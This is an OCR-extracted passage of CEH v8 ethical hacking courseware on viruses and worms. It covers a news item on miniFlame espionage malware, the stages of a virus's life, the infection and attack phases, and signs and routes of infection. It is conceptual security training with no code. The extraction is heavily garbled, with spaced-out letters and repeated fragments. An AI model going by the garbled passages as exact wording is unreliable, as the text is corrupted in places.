Professional Documents
Culture Documents
Module 07
E th ic a l H a c k in g
a n d
C o u n te rm e a s u re s v 8
M o d u le 0 7 : V iru s e s a n d W o r m s E xam 3 1 2 -5 0
M o d u le 0 7 P ag e 1007
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0linCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
S ecurity N ew s
I G lo b a lR e s e a rc h
CEH
H om e
P r o d u c ts
A bout
5 rv *c c s
O c to b e r 1 9 ,2 0 1 2
G lo b a l C y b e r-W a rfa re M a lw a re u s e d
T a c tic s : N ew
F la m e -lin k e d
in C y b e r - E s p i o n a g e
A n e w c y b e r e s p io n a g e p ro g ra m linked to th e n o to r io u s F lam e a n d G au ss m a lw a re h a s b e e n d e t e c te d by R ussia's K aspersky Lab. T he an ti-v iru s g ia n t's c h ief w a rn s t h a t global cy b e r w a r f a r e is in "full sw in g " a n d will p ro b a b ly e s c a la te in 2013. T h e virus, d u b b e d m in iF lam e, a n d a lso kn o w n a s SPE, h as a lr e a d y in fe c te d c o m p u te r s in Iran , L e b an o n , France, t h e U n ite d S ta te s a n d L ith u an ia. It w as d isco v e red in July 2 0 1 2 a n d is d e s c rib e d a s o n its w e b s ite . T he m a lw a re w a s originally id e n tified a s a n a p p e n d a g e of F lam e - th e p ro g ra m u se d fo r ta r g e te d cy b e r e s p io n a g e in th e M iddle E a st a n d a c k n o w le d g e d to b e p a rt o f jo in t U S-lsraeli e f f o r ts to u n d e rm in e Iran 's n u c le a r p ro g ram . B ut later, K aspersky Lab a n a ly s ts d is c o v e re d t h a t m in iF lam e is a n " in t e r o p e r a b l e t o o l t h a t c o u l d b e u s e d a s a n in d e p e n d e n t
m a lic io u s p r o g r a m , o r c o n c u r r e n t ly a s a p l u g - i n f o r b o t h t h e F la m e a n d G a u s s m a lw a r e . "
"a small and highlyflexible malicious program designed to steal data and control infected systems during targeted cyber espionage operations," K aspersky Lab said in a s ta te m e n t p o s te d
h t t p ://w w w . g lo b a /re s e a rc h , ca
C o p y rig h t b y EC -C auactl. A ll R ig h ts R e se rve d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
S e c u r ity an M M
N e w s F la m e - lin k e d
G lo b a l C y b e r - W a r fa r e T a c tic s : N e w M a lw a re u s e d in C y b e r-E s p io n a g e
S o u rc e : h t t p : / / w w w . g l o b a l r e s e a r c h . c a A n e w c y b e r e s p io n a g e p r o g r a m lin k e d t o t h e n o t o r i o u s F la m e a n d G auss m a l w a r e has b e e n d e t e c t e d b y Russia's K a s p e rsky Lab. T h e a n t i v i r u s g ia n t 's c h ie f w a r n s t h a t g lo b a l c y b e r w a r f a r e is in " f u l l s w i n g " a n d p r o b a b l y e s c a la te in 2 0 1 3 . T h e v iru s , d u b b e d m in iF la m e , a nd also k n o w n as SPE, has a lr e a d y i n f e c t e d c o m p u t e r s in Iran, L e b a n o n , F rance, t h e U n ite d States, a n d L ith u a n ia . It w a s d is c o v e r e d in July 2 0 1 2 a n d is
M o d u le 0 7 P ag e 1008
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
B u t la t e r , K a sp e rsky Lab a n a ly s ts d is c o v e r e d t h a t m i n i F l a m e is an " i n t e r o p e r a b l e t o o l t h a t c o u ld be used as an i n d e p e n d e n t m a lic io u s p r o g r a m , o r c o n c u r r e n t l y as a p lu g - in f o r b o t h t h e Flam e a n d Gauss m a l w a r e . " T h e a na lysis also s h o w e d n e w e v id e n c e o f c o o p e r a t i o n b e t w e e n t h e c r e a t o r s o f F la m e a nd Gauss, as b o t h v iru s e s can use m in i F la m e f o r t h e i r o p e r a t i o n s . " M i n i F l a m e ' s a b i l it y t o be used as a p lu g - in b y e i t h e r F lam e o r Gauss c le a r ly c o n n e c ts t h e c o ll a b o r a t i o n b e t w e e n t h e d e v e l o p m e n t t e a m s o f b o t h F la m e a n d Gauss. Since t h e c o n n e c t i o n b e t w e e n F la m e a n d S t u x n e t / D u q u has a lr e a d y b e e n r e v e a le d , it can be c o n c l u d e d t h a t all th e s e a d v a n c e d t h r e a t s c o m e f r o m t h e s a m e 'c y b e r w a r f a r e ' f a c t o r y , " K a s p e r s k y Lab said. H ig h - p r e c is io n a tta c k to o l So f a r j u s t 5 0 t o 6 0 cases o f in f e c t i o n h a v e b e e n d e t e c t e d w o r l d w i d e , a c c o r d in g t o K a sp e rs ky Lab. B u t u n lik e F lam e a n d Gauss, m in iF la m e in m e a n t f o r in s t a l l a t i o n o n m a c h in e s a lr e a d y i n f e c t e d b y t h o s e v iru se s . " M i n i F l a m e is a h ig h - p r e c is io n a t t a c k t o o l . M o s t lik e ly it is a t a r g e t e d c y b e r w e a p o n used in w h a t can be d e f i n e d as t h e s e c o n d w a v e o f a c y b e r a t t a c k , " K a s p e rsk y's C h ie f S e c u r ity E x p e rt A l e x a n d e r G o s te v e x p la in e d . "F ir s t, F la m e o r Gauss a re used t o in f e c t as m a n y v i c t i m s as p o s s ib le t o c o lle c t la rg e q u a n t i t i e s o f i n f o r m a t i o n . A f t e r d a ta is c o lle c te d a n d r e v i e w e d , a p o t e n t i a l l y i n t e r e s t i n g v i c t i m is d e f i n e d a n d i d e n t if ie d , a n d m in iF la m e is in s t a lle d in o r d e r t o c o n d u c t m o r e in - d e p t h s u r v e il l a n c e a nd c y b e r-e s p io n a g e ." T h e n e w l y - d i s c o v e r e d m a l w a r e can also t a k e s c r e e n s h o t s o f an i n f e c t e d c o m p u t e r w h i l e it is r u n n i n g a s p e c ific p r o g r a m o r a p p li c a t i o n in such as a w e b b r o w s e r , M i c r o s o f t O ffic e p r o g r a m , A d o b e R eader, i n s t a n t m e s s e n g e r se rv ic e o r FTP c lie n t. K a sp e rsky Lab b e lie v e s m in i F la m e 's d e v e lo p e r s h a v e p r o b a b l y c r e a te d d o z e n s o f d i f f e r e n t m o d i f i c a t i o n s o f t h e p r o g r a m . " A t t h i s t i m e , w e h a v e o n l y f o u n d six o f th e s e , d a t e d 2 0 1 0 - 2 0 1 1 , " t h e f i r m said. C y b e r w a rfa re in fu ll s w in g
M e a n w h i l e , K a s p e rs k y Lab's c o - f o u n d e r a n d CEO E u ge n e K a s p e rs k y w a r n e d t h a t g lo b a l c y b e r w a r f a r e ta c tic s a re b e c o m i n g m o r e s o p h is t ic a t e d w h i l e also b e c o m i n g m o r e t h r e a t e n i n g . He u rg e d g o v e r n m e n t s t o w o r k t o g e t h e r t o f i g h t c y b e r w a r f a r e a n d c y b e r - t e r r o r i s m , X in h u a n e w s a g e n c y r e p o r ts . S p e a k in g a t an I n t e r n a t i o n a l T e l e c o m m u n i c a t i o n U n io n T e le c o m W o r l d c o n f e r e n c e in D u b a i, t h e a n t i v i r u s t y c o o n said, " c y b e r w a r f a r e is in fu ll s w in g a nd w e e x p e c t it t o e s c a la te in 2 0 1 3 ." " T h e la t e s t m a lic io u s v ir u s a t t a c k o n t h e w o r l d ' s la r g e s t o il a n d gas c o m p a n y , Saudi A r a m c o , last A u g u s t s h o w s h o w d e p e n d e n t w e a re t o d a y o n t h e I n t e r n e t a nd i n f o r m a t i o n t e c h n o l o g y in g e n e r a l, a n d h o w v u ln e r a b l e w e a r e ," K a sp e rs ky said. He s t o p p e d s h o r t o f b la m i n g a n y p a r t i c u l a r p la y e r b e h in d t h e m a s s iv e c y b e r - a t t a c k s across t h e M i d d l e East, p o i n t i n g o u t t h a t " o u r j o b is n o t t o i d e n t i t y h a c k e rs o r c y b e r - t e r r o r i s t s . O u r f i r m is
M o d u le 0 7 P ag e 1009
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
like an X -ra y m a c h in e , m e a n i n g w e can scan a n d i d e n t i f y a p r o b l e m , b u t w e c a n n o t say w h o o r w h a t is b e h in d i t . " Iran, w h o c o n f i r m e d t h a t it s u f f e r e d an a t t a c k b y F la m e m a l w a r e t h a t ca u s e d s e v e re d a ta loss, b la m e s t h e U n i t e d S ta te s a nd Israel f o r u n l e a s h i n g t h e c y b e r - a tta c k s .
By Russia Today
h ttp ://w w w .g lo b a lre s e a rc h .c a /g lo b a l-c v b e r-w a rfa re -ta c tic s -n e w -fla m e -lin k e d -m a lw a re -u s e d -in c y b e r-e s p io n a g e /5 3 0 8 8 6 7
M o d u le 0 7 P ag e 1010
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
M o d u le O b je c tiv e s
J J J J J I n t r o d u c tio n to V iru s e s S tages o f V iru s Life W o r k in g o f V iru s e s In d ic a tio n s o f V iru s A tta c k H o w d o e s a C o m p u te r G e t In fe c te d b y V iru s e s y J J V iru s A n a ly s is T y p e s o f V iru s e s V iru s M a k e r J J J J J J J J C o m p u te r W o rm s W o r m A n a ly s is W o rm M a k e r M a lw a r e A n a ly s is P ro c e d u re
CEH
M o d u le
O b je c tiv e s
T h e o b j e c t iv e o f th is m o d u l e is t o e x p o s e y o u t o t h e v a r io u s v iru s e s a n d w o r m s a v a ila b le to d a y . It g ive s y o u i n f o r m a t i o n a b o u t all t h e a v a ila b le v iru s e s a n d w o r m s . This m o d u l e e x a m in e s t h e w o r k i n g s o f a c o m p u t e r v iru s , its f u n c t i o n , c la s s ific a tio n , a n d t h e m a n n e r in w h i c h it a ffe c ts s y s te m s . T his m o d u l e w ill go i n t o d e ta il a b o u t t h e v a r io u s c o u n t e r m e a s u r e s a v a ila b le t o p r o t e c t a g a in s t th e s e v ir u s i n f e c tio n s . T h e m a in o b j e c t iv e o f th is m o d u l e is t o e d u c a t e y o u a b o u t t h e a v a ila b le v iru s e s a nd w o r m s , i n d i c a t i o n s o f t h e i r a t t a c k a nd t h e w a y s t o p r o t e c t a g a in s t v a r io u s v iru s e s , a n d t e s t i n g y o u r s y s te m o r n e t w o r k a g a in s t v iru s e s o r w o r m s p re s e n c e . T his m o d u l e w i ll f a m i l i a r i z e y o u w i t h : 0 0 0 0 0 I n t r o d u c t i o n t o V iru s e s Stages o f V ir u s Life W o r k i n g o f V iru s e s I n d ic a tio n s o f V ir u s A t t a c k How D oes a C o m p u te r Get In f e c t e d by 0 0 0 0 0 0 C o m p u te r W o rm s W o r m A n a ly s is W o rm M aker M a l w a r e A n a ly s is P r o c e d u r e O n lin e M a l w a r e A n a ly s is Services V ir u s a nd W o r m s C o u n te rm e a su re s 0 A n t i v i r u s T o o ls
M o d u le F lo w
V iru s
a n d T y p e s o f V iru s e s
W o rm s C o n c e p ts
C o m p u te r W o rm s
C o u n te rm e a s u re s
M a lw a re A n a ly s is
M o d u le
F lo w
T his s e c tio n in t r o d u c e s y o u t o v a r io u s v iru s e s a n d w o r m s a v a ila b le t o d a y a n d g ive s y o u a b r i e f o v e r v i e w o f e a ch v ir u s a n d s t a t i s t i c s o f v iru s e s a n d w o r m s in t h e r e c e n t y e a rs. It lists v a r io u s t y p e s o f v iru s e s a nd t h e i r e f fe c ts o n y o u r s y s te m . T h e w o r k i n g o f v iru s e s in e a c h p h a s e has w i ll be d iscu sse d in d e ta il. T h e t e c h n i q u e s used b y t h e a t t a c k e r t o d i s t r i b u t e m a l w a r e o n t h e w e b a re h ig h lig h t e d .
V ir u s a n d W o r m s C o n c e p t
M a l w a r e A n a ly s is
T y p e s o f V ir u s e s
f|j|| C o u n t e r m e a s u r e s
^ P e n e t r a t i o n T e s t in g
/
V
C o m p u te r W o rm s
M o d u le 0 7 P ag e 1012
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
CEH
V ir u s
C h a r a c te r i s t ic s
Alters Data %
V
Transforms Itself
% #
F*
Encrypts Itself
Self Propagates
1 f 1
I n t r o d u c t i o n
to
V ir u s e s
C o m p u t e r v i r u s e s h a v e t h e p o t e n t i a l t o w r e a k h a v o c o n b o t h b u sin e ss a n d p e r s o n a l c o m p u t e r s . W o r l d w i d e , m o s t b u sin e sse s h a ve b e e n i n f e c t e d a t s o m e p o i n t . A v ir u s is a se lfr e p li c a t i n g p r o g r a m t h a t p r o d u c e s its o w n c o d e b y a t t a c h i n g c o p ie s o f it i n t o o t h e r e x e c u ta b le c o d e s. T his v ir u s o p e r a t e s w i t h o u t t h e k n o w l e d g e o r d e s ire o f t h e user. Like a real v iru s , a c o m p u t e r v ir u s is c o n t a g i o u s a n d can c o n t a m i n a t e o t h e r file s. H o w e v e r , v iru s e s can i n f e c t o u t s i d e m a c h in e s o n l y w i t h t h e a ss ista n ce o f c o m p u t e r users. S o m e v iru s e s a f f e c t c o m p u t e r s as soon as t h e i r c o d e is e x e c u t e d ; o t h e r v iru s e s lie d o r m a n t u n t i l a p r e - d e t e r m i n e d logical
c i r c u m s t a n c e is m e t . T h e r e a re t h r e e c a te g o r ie s o f m a lic io u s p r o g r a m s : 0 0 0 T r o ja n s a n d r o o t k i t s V iru s e s W o rm s
M o d u le 0 7 P ag e 1013
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
i r u s
a n d
o r m
t a t i s t i c s
7 5 ,0 0 0 ,0 0 0
6 0 ,0 0 0 ,0 0 0
4 5 ,0 0 0 ,0 0 0
3 0 ,0 0 0 ,0 0 0
1 5 ,0 0 0 ,0 0 0
2008
2010
2011
2012
h t t p : / / w w w . a v t e s t . o r g
C o p y rig h t b y E & C t in c t l. A ll R ig h ts R e se rve d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
V ir u s
a n d
o r m
S ta tis tic s
S o u rc e : h t t p : / / w w w . a v - t e s t . o r g T his g ra p h ic a l r e p r e s e n t a t i o n g ive s d e t a i le d i n f o r m a t i o n o f t h e a t t a c k s t h a t h a v e o c c u r r e d in t h e r e c e n t y e a rs. A c c o r d i n g t o t h e g r a p h , o n l y 1 1 ,6 6 6 , 6 6 7 s y s te m s w e r e a f f e c t e d b y v iru s e s a nd w orm s in t h e year 2008, w he re a s in t h e ye ar 2012, th e c o u n t d ra s tic a lly in c r e a s e d to 7 0 ,0 0 0 ,0 0 0 s y s te m s , w h i c h m e a n s t h a t t h e g r o w t h o f m a l w a r e a tta c k s o n s y s te m s is in c r e a s in g e x p o n e n t ia l ly y e a r b y ye a r.
M o d u le 0 7 P ag e 1014
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
7 5 .0 0 0 .0 0 0
6 0 .0 0 0 .0 0 0
4 5 .0 0 0 .0 0 0
3 0 .0 0 0 .0 0 0
1 5 .0 0 0 .0 0 0
0
2008 2009 2010 2011 2012
M o d u le 0 7 P ag e 1015
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0l1nCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
D e s ig n Developing virus code using program m ing languages or co n stru c tio n kits
R e p lic a tio n Virus replicates for a p eriod o f tim e w ithin th e ta rg e t sy stem a n d th e n s p read s itself
L aunch It g ets activ ated w ith th e u ser perform ing certain actio n s such as running an infected pro g ram
S ta g e s
o f V ir u s
L ife
C o m p u t e r v ir u s a tta c k s s p re a d t h r o u g h v a r io u s sta ge s f r o m i n c e p t io n t o d e s ig n t o e lim in a tio n . 1. D e s ig n : A v ir u s c o d e is d e v e lo p e d by u s in g p r o g r a m m i n g la n g u a g e s o r c o n s t r u c t i o n kits. A n y o n e w i t h basic p r o g r a m m i n g k n o w l e d g e can c r e a te a viru s . 2. R e p l ic a t i o n : A v ir u s f i r s t r e p lic a te s it s e lf w i t h i n a t a r g e t s y s te m o v e r a p e r io d o f t i m e . 3. Launch: It is a c t i v a t e d w h e n a u s e r p e r f o r m s c e r t a i n a c tio n s such as t r i g g e r i n g o r r u n n i n g an in fe c te d p ro g ra m . 4. D e te c tio n : A v ir u s is i d e n t if ie d as a t h r e a t i n f e c t i n g t a r g e t s y s te m s . Its a c tio n s ca use c o n s id e r a b le d a m a g e t o t h e t a r g e t s y s te m 's d a ta .
M o d u le 0 7 P ag e 1016
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0l1nCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
5.
In c o rp o ra tio n : A n t i v i r u s s o f t w a r e d e v e l o p e r s a s s e m b l e d e f e n s e s a g a in s t t h e viru s .
6.
M o d u le 0 7 P ag e 1017
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
o r k in g
o f
V ir u s e s :
I n f e c t i o n
P h a s e
Infection Phase
B e fo re
In fe c tio n
A fte r In fe c tio n
*
C le an File V irus In fe c te d File
o r k in g a tta c k
o f V ir u s e s : a ta rg e t h o s t's
In fe c tio n s y s te m by
V ir u s e s
G e n e r a lly v iru s e s h a ve t w o phases, t h e i n f e c t i o n p h a s e a n d t h e a t t a c k p h a s e . In t h e i n f e c t i o n p ha se, t h e v i r u s r e p li c a t e s i t s e lf a n d a t t a c h e s t o an .e xe f ile in t h e s y s te m . P r o g r a m s m o d i f i e d by a v ir u s i n f e c t i o n can e n a b le v ir u s f u n c t i o n a l i t i e s t o ru n o n t h a t s y s te m . V iru s e s g e t e n a b le d as s o o n as t h e i n f e c t e d p r o g r a m is e x e c u te d , since t h e p r o g r a m c o d e leads t o t h e v ir u s c o d e . V ir u s w r i t e r s h a v e t o m a i n t a i n a b a la n c e a m o n g f a c t o r s such as: H o w w i ll t h e v ir u s in f e c t? H o w w i ll it s p re a d ? H o w w i ll it re s id e in a t a r g e t c o m p u t e r ' s m e m o r y w i t h o u t b e in g d e t e c t e d ?
M o d u le
07
P ag e 1 0 1 8
p r o g r a m s d o n o t in f e c t t h e p r o g r a m s w h e n f i r s t e x e c u te d . T h e y re s id e in a c o m p u t e r ' s m e m o r y a n d in f e c t p r o g r a m s a t a l a t e r t i m e . Such v ir u s p r o g r a m s as TSR w a i t f o r a s p e c ifie d t r i g g e r e v e n t t o s p re a d a t a l a t e r s ta ge . It is, t h e r e f o r e , d i f f i c u l t t o r e c o g n iz e w h i c h e v e n t m i g h t t r i g g e r t h e e x e c u t i o n o f a d o r m a n t v ir u s i n f e c t i o n . R e fe r t o t h e f i g u r e t h a t f o l l o w s t o see h o w t h e EXE file i n f e c t i o n w o r k s . In t h e f o l l o w i n g f ig u r e , t h e .EXE file 's h e a d e r , w h e n t r i g g e r e d , e x e c u te s a n d s ta r t s r u n n i n g t h e a p p li c a t i o n . O n c e t h is file is i n f e c t e d , a n y t r i g g e r e v e n t f r o m t h e file 's h e a d e r can a c t i v a t e t h e v ir u s c o d e t o o , a lo n g w i t h t h e a p p li c a t i o n p r o g r a m as s o o n as it is ru n . Q A f ile v ir u s i n f e c ts b y a t t a c h i n g its e lf t o an e x e c u t a b l e s y s te m a p p li c a t i o n p r o g r a m . T e x t file s su ch as s o u r c e c o d e , b a tc h file s, s c r ip t files, e tc., a re c o n s id e r e d p o t e n t i a l t a r g e t s f o r v iru s in f e c tio n s . B o o t s e c t o r v iru s e s e x e c u te t h e i r o w n c o d e in t h e f i r s t p la ce b e f o r e t h e t a r g e t PC is b o o te d
B e fo re In fe c tio n A fte r In fe c tio n
.exe
_u
C le a n F ile V ir u s I n f e c t e d F ile
M o d u le 0 7 P ag e 1019
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
W D U
^
o r k in g
o q p
^
o f
V ir u s e s :
A t t a c k
r
U rtfW<
cu
ttkxjl Nm Im
V t
11
J J
V iru s e s a re p r o g r a m m e d w ith tr ig g e r e v e n ts t o a c tiv a te a n d c o r r u p t s y s te m s S o m e v iru s e s in fe c t e a c h tim e th e y a re r u n a n d o th e r s in fe c t o n ly w h e n a c e r ta in p r e d e fin e d c o n d itio n is m e t s u c h as a u s e r's s p e c ific t a s k , a day, tim e , o r a p a r tic u la r e v e n t
U n fra g m e n te d
F ile B e f o r e A tta c k 11
File: A 1
Page: 1 P a g e :2
File: B
P a g e :2
1
P a g e :3
___________________ 1 P a g e :3
P age: 1
F ile F r a g m e n te d
D u e to
V iru s A tta c k
Page: 1 F ile : A
P a g e :3 F ile : B
P age: 1 F ile : B
P a g e :3 F ile : A
P a g e :2 F ile : B
P a g e :2 F ile : A
o r k in g
o f V ir u s e s : A tta c k
P h a s e
O n c e v iru s e s s p re a d t h e m s e lv e s t h r o u g h o u t t h e t a r g e t s y s te m , t h e y s t a r t c o r r u p t i n g t h e file s a n d p r o g r a m s o f t h e h o s t s y s te m . S o m e v iru s e s h a v e t r i g g e r e v e n ts t h a t n e e d t o be a c t iv a t e d t o c o r r u p t t h e h o s t s y s te m . S o m e v ir u s e s h a v e bugs t h a t r e p lic a t e th e m s e lv e s , a nd p e r f o r m a c tiv it ie s such as d e l e t i n g f ile s a n d in c r e a s in g s e s s io n t i m e . T h e y c o r r u p t t h e i r t a r g e t s o n ly a f t e r s p re a d in g as i n t e n d e d b y t h e i r d e v e lo p e r s . M o s t v iru s e s t h a t a t t a c k t a r g e t s y s te m s p e r f o r m a c tio n s such as: Q D e le tin g file s a n d a l t e r i n g c o n t e n t in d a ta files, t h e r e b y c a u s in g t h e s y s te m t o s lo w down
P e r f o r m in g ta sks a n im a t io n s
not
r e la t e d
to
a p p lic a tio n s ,
such
as p la y in g
m u s ic
and
c r e a tin g
M o d u le 0 7 P ag e 1020
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
U n fra g m e n te d
F ile
B e fo re
A tta c k
File: A
P age: 1 P age: 2 P age: 3 P age: 1
File: B
P age: 2 P age: 3
F ile
F ra g m e n te d
D u e to
V iru s A tta c k
P age: 1 F ile: A
P age: 3 F ile : B
P age: 1 F ile: B
P age: 3 F ile : A
P age: 2 F ile : B
P age: 2 F ile : A
A
FIGURE 7 .3 : W o rk in g o f V iru s e s in A tta c k Phase
R e fe r t o t h is f i g u r e , w h i c h has t w o file s, A a n d B. In s e c tio n o n e , t h e t w o file s a re l o c a te d o n e a f t e r t h e o t h e r in an o r d e r l y f a s h io n . O n c e a v ir u s c o d e i n f e c ts t h e file , it a lte r s t h e p o s i t i o n i n g o f t h e file s t h a t w e r e c o n s e c u t i v e l y p la c e d , t h u s l e a d in g t o in a c c u r a c y in f ile a llo c a tio n s , c a u s in g t h e s y s te m t o s l o w d o w n as users t r y t o r e t r i e v e t h e i r file s. In t h i s p ha se: 0 Q V iru s e s e x e c u te w h e n s o m e e v e n ts a re t r i g g e r e d S o m e e x e c u te a n d c o r r u p t via b u i l t - i n b u g p r o g r a m s a f t e r b e in g s t o r e d in t h e h o s t's m em ory
M o s t v iru s e s a re w r i t t e n t o c o n c e a l t h e i r p re s e n c e , a t t a c k in g o n l y a f t e r s p r e a d in g in t h e h o s t t o t h e f u l le s t e x t e n t
M o d u le 0 7 P ag e 1021
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
h y
D o
P e o p le
C r e a t e
C o m
p u t e r
r
UrtifWd
c | ttkiul
u
Km Im
V ir u s e s
o m
p u t e r V ir u s e s
I n f lic t d a m a g e t o c o m p e tito r s
F in a n c ia l b e n e fits
R e s e a rc h p r o je c ts
P la y p r a n k
J J J
V a n d a lis m
C y b e r te r r o r is m
D is tr ib u te p o litic a l m e ssa g e s
V u ln e r a b le S y s te m
W h y
D o
P e o p le
C re a te
C o m p u te r V ir u s e s ?
S o u rc e : h t t p : / / w w w . s e c u r i t y d o c s . c o m C o m p u t e r v iru s e s a re n o t s e lf - g e n e r a t e d , b u t a re c r e a te d b y c y b e r - c r i m i n a l m in d s , i n t e n t i o n a l l y d e s ig n e d t o ca use d e s t r u c t i v e o c c u r r e n c e s in a s y s te m . G e n e ra lly , v iru s e s a re c r e a te d w i t h a d is r e p u t a b l e m o t i v e . C y b e r - c r im i n a l s c r e a te v iru s e s t o d e s t r o y a c o m p a n y 's d a ta , as an a c t o f v a n d a lis m o r a p ra n k , o r t o d e s t r o y a c o m p a n y 's p r o d u c ts . H o w e v e r , in s o m e cases, v iru s e s are a c t u a lly in te n d e d to be g o o d fo r a s y s te m . T he se a re d e s ig n e d to im p ro v e a s y s te m 's
p e r f o r m a n c e b y d e l e t in g p r e v io u s ly e m b e d d e d v iru s e s f r o m files. S o m e r e a s o n s v iru s e s h a v e b e e n w r i t t e n in c lu d e : e 0 0 0 0 I n flic t d a m a g e t o c o m p e t i t o r s R esearch p r o je c ts Pranks V a n d a lis m A t t a c k t h e p r o d u c t s o f s p e c ific c o m p a n i e s D is t r i b u t e p o litic a l m essa ge s F ina ncia l g ain
M o d u le 0 7 P ag e 1022
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
Q Q Q
M o d u le 0 7 P ag e 1023
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
P ro c e s s e s ta k e m o r e re s o u rc e s a n d tim e
In d ic a tio n s
o f V ir u s
A tta c k s
A n e f f e c t i v e v iru s t e n d s t o m u l t i p l y r a p id l y a n d m a y in f e c t a n u m b e r o f m a c h in e s w i t h i n t h r e e t o f iv e days. V iru s e s ca n in f e c t W o r d fi l e s w h i c h , w h e n t r a n s f e r r e d , can in f e c t t h e m a c h in e s o f t h e u sers w h o r e c e iv e t h e m . A v ir u s can also m a k e g o o d use o f f ile s e rv e rs in o r d e r t o i n f e c t file s . T h e f o l l o w i n g a re i n d i c a t i o n s o f a v i r u s a t t a c k o n a c o m p u t e r s y s te m : 0 0 0 0 0 P r o g r a m s ta k e lo n g e r t o loa d T h e h a r d d r iv e is a lw a y s fu ll, e v e n w i t h o u t in s t a llin g a n y p r o g r a m s T h e f l o p p y d is k d r iv e o r h a r d d r i v e r u n s w h e n it is n o t b e in g used U n k n o w n file s k e e p a p p e a r i n g o n t h e s y s te m T h e k e y b o a r d o r t h e c o m p u t e r e m i t s s tr a n g e o r b e e p in g s o u n d s T h e c o m p u t e r m o n i t o r d is p la y s s tr a n g e g r a p h ic s File n a m e s t u r n s tr a n g e , o f t e n b e y o n d r e c o g n i t i o n T h e h a r d d r iv e b e c o m e s in a c c e s s ib le w h e n t r y i n g t o b o o t f r o m t h e f l o p p y d r i v e A p r o g r a m 's size k e e p s c h a n g in g T h e m e m o r y o n t h e s y s te m s e e m s t o be in use a nd t h e s y s te m s lo w s d o w n
M o d u le 0 7 P ag e 1024
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
H o w
d o e s
a b y
o m
p u t e r
G e t
I n f e c t e d
V ir u s e s
W h e n a u s e r a c c e p ts f i l e s a n d d o w n l o a d s w i t h o u t c h e c k in g p r o p e r ly f o r t h e s o u rc e
in g in f e c t e d e - m a i l a t t a c h m e n t s
I n s t a llin g p i r a t e d s o f t w a r e
N o t u p d a t i n g a n d n o t i n s t a llin g n e w v e r s io n s o f p lu g - in s
: r u n n i n g t h e la t e s t a n t i - v i r u s a p p l i c a t i o n
H o w
'\ y;.-.v A y .
D o e s
a C o m p u te r G e t In fe c te d
b y
V ir u s e s ?
T h e r e a re m a n y w a y s in w h i c h a c o m p u t e r g e ts i n f e c t e d b y viru s e s . T h e m o s t p o p u l a r m e t h o d s a re as f o l lo w s : 0 0 W h e n a u s e r a c c e p ts file s a n d d o w n l o a d s w i t h o u t c h e c k in g p r o p e r l y f o r t h e s o u rc e . A t t a c k e r s u s u a lly se n d v i r u s - in f e c t e d file s as e m a il a t t a c h m e n t s t o s p re a d t h e v ir u s on t h e v i c t i m ' s s y s t e m . If t h e v i c t i m o p e n s t h e m a il, t h e v ir u s a u t o m a t i c a l l y i n f e c ts t h e s y s te m . 0 A t t a c k e r s i n c o r p o r a t e v iru s e s in p o p u l a r s o f t w a r e p r o g r a m s a n d u p lo a d t h e i n f e c t e d s o ftw a re on w e b s ite s in te n d e d to d o w n lo a d s o ftw a re . W h e n th e v ic tim i n f e c t e d s o f t w a r e a n d in s ta lls it, t h e s y s te m g e ts i n f e c t e d . 0 Failing t o in s ta ll n e w v e r s io n s o r u p d a t e w i t h la t e s t p a t c h e s i n t e n d e d t o fix t h e k n o w n b ug s m a y e x p o s e y o u r s y s te m t o viru s e s . 0 W i t h t h e in c r e a s in g t e c h n o l o g y , a tt a c k e r s also a re d e s ig n in g n e w v iru s e s . Failing t o use la t e s t a n t i v i r u s a p p li c a t i o n s m a y e x p o s e y o u t o v i r u s a t t a c k s d o w n lo a d s
M o d u le 0 7 P ag e 1025
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
C o m m o n T e c h n iq u e s D is tr ib u te M a lw a r e
U s e d
to
o n
th e W e b
CEH
B la c k h a t S e a rc h O p tim iz a tio n
E n g in e
(S E O )
M a lv e rtis in g
S o c ia l E n g in e e re d C lic k -ja c k in g
C o m p ro m is e d W e b s ite s
L e g itim a te
S p e a rp h is h in g
S ite s
D riv e -b y D o w n l o a d s
M im ic k in g le g itim a te in s titu tio n s , such as banks, in an a tte m p t to steal a c c o u n t login cre d e n tia ls
jl.
C o m m o n ^ th e W e b
T e c h n iq u e s
U s e d
to
D is tr ib u te
M a lw a r e
o n
